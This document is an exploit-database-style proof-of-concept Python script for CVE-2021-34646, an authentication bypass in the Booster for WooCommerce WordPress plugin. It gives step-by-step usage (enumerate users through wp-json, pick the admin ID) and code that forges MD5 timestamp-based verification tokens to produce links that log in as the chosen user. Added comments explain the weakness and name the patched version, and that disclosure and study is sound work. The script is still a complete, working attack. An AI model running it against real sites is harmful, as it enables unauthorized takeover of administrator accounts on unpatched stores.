WordPress WooCommerce Booster 5.4.3 Authentication Bypass

  • # Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
    # Date: 2021-09-16
    # Exploit Author: Sebastian Kriesten (0xB455)
    # Contact: https://twitter.com/0xB455
    #
    # Affected Plugin: Booster for WooCommerce
    # Plugin Slug: woocommerce-jetpack
    # Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/
    # Affected Versions: <= 5.4.3
    # Fully Patched Version: >= 5.4.4
    # CVE: CVE-2021-34646
    # CVSS Score: 9.8 (Critical)
    # Category: webapps
    #
    # 1:
    # Goto: https://target.com/wp-json/wp/v2/users/
    # Pick a user-ID (e.g. 1 - usually is the admin)
    #
    # 2:
    # Attack with: ./exploit\_CVE-2021-34646.py https://target.com/ 1
    #
    # 3:
    # Check out which of the generated links allows you to access the system
    #
    import requests,sys,hashlib
    import argparse
    import datetime
    import email.utils
    import calendar
    import base64
    
    # ANSI colour escapes for the console output below (blue, white, red, reset).
    B = "\033[94m"
    W = "\033[97m"
    R = "\033[91m"
    RST = "\033[0;0m"
    
    # Command-line interface: a base URL and a numeric user id. Both are positional,
    # so the `default=1` on `id` is ineffective -- argparse still requires the value.
    parser = argparse.ArgumentParser()
    parser.add\_argument("url", help="the base url")
    parser.add\_argument('id', type=int, help='the user id', default=1)
    args = parser.parse\_args()
    id = str(args.id) # NOTE: shadows the builtin `id` for the rest of the script
    url = args.url
    if args.url[-1] != "/": # URL needs trailing /
     url = url + "/"
    
    # This request is only used for its response: the status code is checked here
    # and the `Date` header is read further down as the time base for the guesses.
    verify\_url= url + "?wcj\_user\_id=" + id
    r = requests.get(verify\_url) # NOTE(review): no timeout is set, so a stalled server blocks the script
    
    # Anything other than HTTP 200 aborts; the response headers are dumped to aid troubleshooting.
    if r.status\_code != 200:
     print("status code != 200")
     print(r.headers)
     sys.exit(-1)
    
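    def email_time_to_timestamp(s):
        """Convert an RFC 2822 date string (e.g. an HTTP ``Date`` header) to a unix timestamp.

        Args:
            s: the date string to parse.

        Returns:
            The epoch seconds as an int, or ``None`` when *s* cannot be parsed.
            A date without a timezone designator is treated as UTC (offset 0)
            rather than raising ``TypeError``.
        """
        parsed = email.utils.parsedate_tz(s)
        if parsed is None:
            return None
        # parsedate_tz yields the wall-clock fields plus the UTC offset in seconds
        # (None when absent). timegm interprets the fields as UTC, so subtracting
        # the offset gives the true epoch value.
        offset = parsed[9] or 0
        return calendar.timegm(parsed) - offset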
    
    # Time base for the candidate tokens: the server's own clock as reported in the
    # HTTP Date header (KeyError if the server did not send one), as a unix timestamp.
    date = r.headers["Date"]
    unix = email\_time\_to\_timestamp(date) # None if the header does not parse; the arithmetic in the loop below would then raise
    
    def printBanner():
        """Print the time base (human-readable and unix) and a short note on why
        several candidate links are generated.

        Reads the module globals ``date``, ``unix`` and the colour codes ``W``/``B``.
        """
        lines = [
            f"{W}Timestamp: {B}{date}",
            f"{W}Timestamp (unix): {B}{unix}{W}\n",
            "We need to generate multiple timestamps in order to avoid delay related timing errors",
            "One of the following links will log you in...\n",
        ]
        print("\n".join(lines))
    
    printBanner()
    
    
    
    # Core of the weakness this PoC demonstrates: the "code" inside the verification
    # token is the MD5 of a plain unix timestamp, so it is reproducible by anyone who
    # knows roughly when it was minted. The script assumes that moment is close to
    # the server's Date header and tries three adjacent seconds to absorb clock skew
    # and latency. Mitigation is the patched plugin version given in the header.
    for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors
     hash = hashlib.md5(str(unix-i).encode()).hexdigest() # NOTE: shadows the builtin `hash`
     print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:")
     token='{"id":"'+ id +'","code":"'+hash+'"}' # JSON assembled by concatenation; acceptable only because `id` is a numeric string
     token = base64.b64encode(token.encode()).decode()
     token = token.rstrip("=") # remove trailing =
     link = url+"my-account/?wcj\_verify\_email="+token
     print(link + f"\n{RST}")
     
    
    
    
    